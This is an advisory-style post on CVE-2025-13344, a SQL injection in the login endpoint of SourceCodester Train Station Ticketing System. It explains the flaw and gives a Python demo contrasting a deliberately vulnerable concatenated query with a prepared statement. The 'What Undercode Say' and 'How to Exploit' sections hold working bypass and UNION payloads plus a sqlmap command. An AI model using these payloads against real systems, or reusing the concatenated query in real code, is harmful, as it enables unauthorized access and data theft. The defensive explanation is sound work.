SourceCodester Train Station Ticketing System, SQL Injection, CVE-2025-13344 (Medium)


The vulnerability in SourceCodester Train Station Ticketing System 1.0 lies in the `/ajax.php?action=login` endpoint. The application does not sanitize the user-supplied `Username` parameter before incorporating it into an SQL query. An attacker can send a crafted HTTP POST request whose Username field carries SQL metacharacters, such as a single quote (`'`) or a boolean clause like `' OR '1'='1`. Because the query is built by string concatenation rather than with prepared statements, this input is appended verbatim to the SQL statement executed on the backend database and changes the query's logic, potentially allowing the attacker to bypass authentication, read sensitive data from the database, or modify its contents, all without valid credentials.
Platform: SourceCodester Train Station Ticketing System
Version: 1.0
Vulnerability: SQL Injection
Severity: Medium
Date: 11/18/2025

Prediction: Patch expected by 12/20/2025

What Undercode Say:

`curl -X POST -d "Username=admin' OR '1'='1'--&Password=any" http://target/ajax.php?action=login`
`sqlmap -u "http://target/ajax.php" --data="action=login&Username=test&Password=test" -p Username --batch`

```http
POST /ajax.php?action=login HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded

Username=test' UNION SELECT 1,2,version()--&Password=pass
```

How to Exploit:

Craft malicious POST request to `/ajax.php?action=login` with SQL payloads in the `Username` parameter to bypass login or dump database information.

Protection from this CVE:

Use prepared statements.

Implement input validation.

Apply vendor patch.
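To show why the first two recommendations close this bug, here is an added example (not code from the advisory or from the SourceCodester project) that models the flawed login query against an in-memory SQLite table and places it beside a parameterized version guarded by a username allow-list. The table contents, credentials, function names and regular expression are all constructed for this demonstration; the real application's PHP code is not reproduced here.

```python
import re
import sqlite3

# Allow-list for the Username parameter (constructed for the demo): letters,
# digits, underscore, dot and dash, 1-32 characters. Quotes, spaces and SQL
# comment markers never pass this check.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def build_db():
    """Create a constructed stand-in for the ticketing system's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, "
        "username TEXT NOT NULL, password TEXT NOT NULL)"
    )
    # Plain-text password kept only to keep the demo short; a real system
    # stores a password hash and compares against that.
    conn.execute(
        "INSERT INTO users (username, password) VALUES ('admin', 'S3cret!')"
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Mirror the flaw in the advisory: user input concatenated into SQL text.

    Returns the matched user id, or None when no row matches or the
    injected text breaks the statement.
    """
    sql = (
        "SELECT id FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Prepared statement: the driver binds values, so input is never SQL."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def valid_username(username):
    """Input validation step: reject anything outside the allow-list."""
    return USERNAME_RE.fullmatch(username) is not None


def login_hardened(conn, username, password):
    """Both mitigations from the advisory: validate, then bind parameters."""
    if not valid_username(username):
        return None
    return login_parameterized(conn, username, password)


if __name__ == "__main__":
    db = build_db()
    payload = "admin' OR '1'='1'--"  # same bypass string as the curl example above
    print("vulnerable, payload   ->", login_vulnerable(db, payload, "any"))
    print("parameterized, payload->", login_parameterized(db, payload, "any"))
    print("hardened, payload     ->", login_hardened(db, payload, "any"))
    print("hardened, real creds  ->", login_hardened(db, "admin", "S3cret!"))
```

Running the script shows the concatenated query returning the admin row for the injected username while both the parameterized query and the validated login return no match; the legitimate credentials still succeed through the hardened path. The allow-list is a defence-in-depth layer only: the parameter binding is what removes the injection, and the regex should be loosened to whatever character set the real application must accept.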

Impact:

Authentication Bypass.

Data Theft.

Unauthorized Access.


Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
